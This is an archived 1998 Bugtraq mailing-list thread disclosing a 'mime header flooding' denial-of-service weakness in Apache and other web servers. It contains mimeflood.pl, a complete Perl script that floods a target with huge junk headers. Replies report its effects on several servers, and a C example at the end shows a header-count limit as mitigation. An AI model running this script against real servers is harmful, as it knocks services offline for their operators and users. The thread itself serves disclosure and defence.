---------- Forwarded message ----------
From: Laurent FACQ (facq@U-BORDEAUX.FR)
To: BUGTRAQ@netspace.org
Date: Thu, 3 Sep 1998 12:34:22 +0200
Subject: Web servers / possible DOS Attack / mime header flooding

#! /bin/perl
# mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)
# Web servers / possible DOS Attack / "mime header flooding"
#
# looking at the apache 1.2.5 source code i found
# that there was no limit on how many mime headers could
# be included in a client request. The only limits
# are : 8192 byte for each header, 300 sec. on reading headers.
#
# => by sending a crazy amount of 8000 bytes headers, it's possible
# to consume a lot of memory (and of course CPU). The point
# is that httpd daemons grow and STAY at this big size (or die
# if you send too much)
#
# -> maybe a limit on mime header number could be added.
#
# -> maybe other web servers could be vulnerable to this problem.
#
# - i tried on an apache 1.2.5 -> it works
# - i didn't install 1.3.1 but looking at the source code,
# i think the problem is there too.
#
##################################################
#From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
#
#[...]
#>
#> -> may be a limit on mime header number could be added.
#
#Such limits have already been added to 1.3.2-dev.
#
#.....Roy
use Socket;
# Usage : $0 host [port [max] ]
$max= 0;
if ($ARGV[2])
{
    $max= $ARGV[2];
}
$proto = getprotobyname('tcp');
socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
$port = 80;
if ($ARGV[1])
{
    $port= $ARGV[1];
}
$host = $ARGV[0];
$sin = sockaddr_in($port,inet_aton($host));
connect(Socket_Handle,$sin);
send Socket_Handle,"GET / HTTP/1.0\n",0;
$val= ('z'x8000)."\n";
$n= 1;
$|= 1;
while (Socket_Handle)
{
    send Socket_Handle,"Stupidheader$n: ",0;
    send Socket_Handle,$val,0;
    $n++;
    if (!($n % 100))
    {
        print "$n\n";
    }
    if ($max && ($n > $max))
    {
        last;
    }
}
print "Done: $n\n";
send Socket_Handle,"\n",0;
# print whatever the server sends back
while (<Socket_Handle>)
{
    print $_;
}
From jericho@dimensional.com Mon Oct 19 15:07:54 1998
Date: Sun, 27 Sep 1998 15:09:51 -0600 (MDT)
From: mea culpa
To: root@repsec.com
Subject: Re: Web servers / possible DOS Attack / mime header flooding (fwd)

---------- Forwarded message ----------
From: Daniel Leeds
To: BUGTRAQ@netspace.org
Date: Thu, 3 Sep 1998 14:51:42 -0700
Subject: Re: Web servers / possible DOS Attack / mime header flooding

IIS on NT 4.0 sp3, and the stock Windows 98 http server appear to be immune.
However some other 3rd party products appear vulnerable.

UnityMail 2.0 for 95/NT *IS* vulnerable to the DOS. CPU load forks to 100%,
the system is useable, however all access to the UnityMail administrative web
server is hung.

The above is probably not a huge deal, other than annoying mailing list admins
who want to access their lists via the web admin, but I think it's probably
illustrative of a wider scope---> how many other administrative web interfaces,
commercial http servers, etc are vulnerable to this denial of service?

On 03-Sep-98 Rich Wood wrote:
> On 3 Sep 98, at 12:34, Laurent FACQ wrote:
>> # => by sending a crazy amount of 8000 bytes headers, it's possible
>> # to consume a lot of memory (and of course CPU). The point
>> # is that httpd daemons grow and STAY at this big size (or die
>> # if you send too much)
>
> Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
> after 2500 headers with apache using 30Mb.
>
> Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
> 7500 headers, apache was using 120Mb RAM and the box ground to a halt.
>
> It didn't actually crash apache on either box, but severely reduced the
> usefulness of the systems.
>
> Rich
> --
> Rich Wood
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Daniel Leeds Systems Administrator
dleeds@dfacades.com DigitalFacades
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
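
Added example, not part of the original posts and not Apache's own code: a C sketch of the kind of limit discussed in this thread, capping the number of header fields alongside the 8192-byte per-header limit the first post cites. The 100-field cap, the function names and the constructed X-Pad sample headers are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
/* Assumed caps: 8192 bytes per header is the limit the post cites; 100 fields is chosen here. */
#define MAX_FIELDS     100
#define MAX_FIELD_SIZE 8192
enum hdr_result { HDR_OK, HDR_TOO_MANY, HDR_TOO_LONG, HDR_INCOMPLETE };

/* Scan the header lines after the request line in buf[0..len); nothing is stored per header. */
enum hdr_result check_headers(const char *buf, size_t len, size_t *nfields)
{
    size_t pos = 0;
    *nfields = 0;
    while (pos < len) {
        const char *nl = memchr(buf + pos, '\n', len - pos);
        size_t linelen = nl ? (size_t)(nl - (buf + pos)) : len - pos;
        if (linelen > MAX_FIELD_SIZE)
            return HDR_TOO_LONG;      /* oversized even before its newline arrives */
        if (!nl)
            return HDR_INCOMPLETE;    /* caller must read more from the client */
        if (linelen == 0 || (linelen == 1 && buf[pos] == '\r'))
            return HDR_OK;            /* blank line ends the headers */
        if (++*nfields > MAX_FIELDS)
            return HDR_TOO_MANY;      /* caller rejects and stops reading */
        pos += linelen + 1;
    }
    return HDR_INCOMPLETE;
}

/* Constructed sample input: n "X-Pad<i>: zzz..." lines with vlen-byte values, then a blank line. */
size_t build_headers(char *out, size_t cap, int n, int vlen)
{
    size_t off = 0;
    for (int i = 1; i <= n && off + (size_t)vlen + 32 < cap; i++) {
        off += (size_t)snprintf(out + off, cap - off, "X-Pad%d: ", i);
        memset(out + off, 'z', (size_t)vlen);
        off += (size_t)vlen;
        out[off++] = '\n';
    }
    out[off++] = '\n';
    return off;
}

int main(void)
{
    static char buf[1 << 20];
    size_t n, len = build_headers(buf, sizeof buf, 120, 8000);
    enum hdr_result r = check_headers(buf, len, &n);
    printf("result=%d after %zu fields\n", (int)r, n);
    return 0;
}
```

With both caps in place, the memory one request can make the server hold for headers is bounded by MAX_FIELDS times MAX_FIELD_SIZE, whatever the client keeps sending.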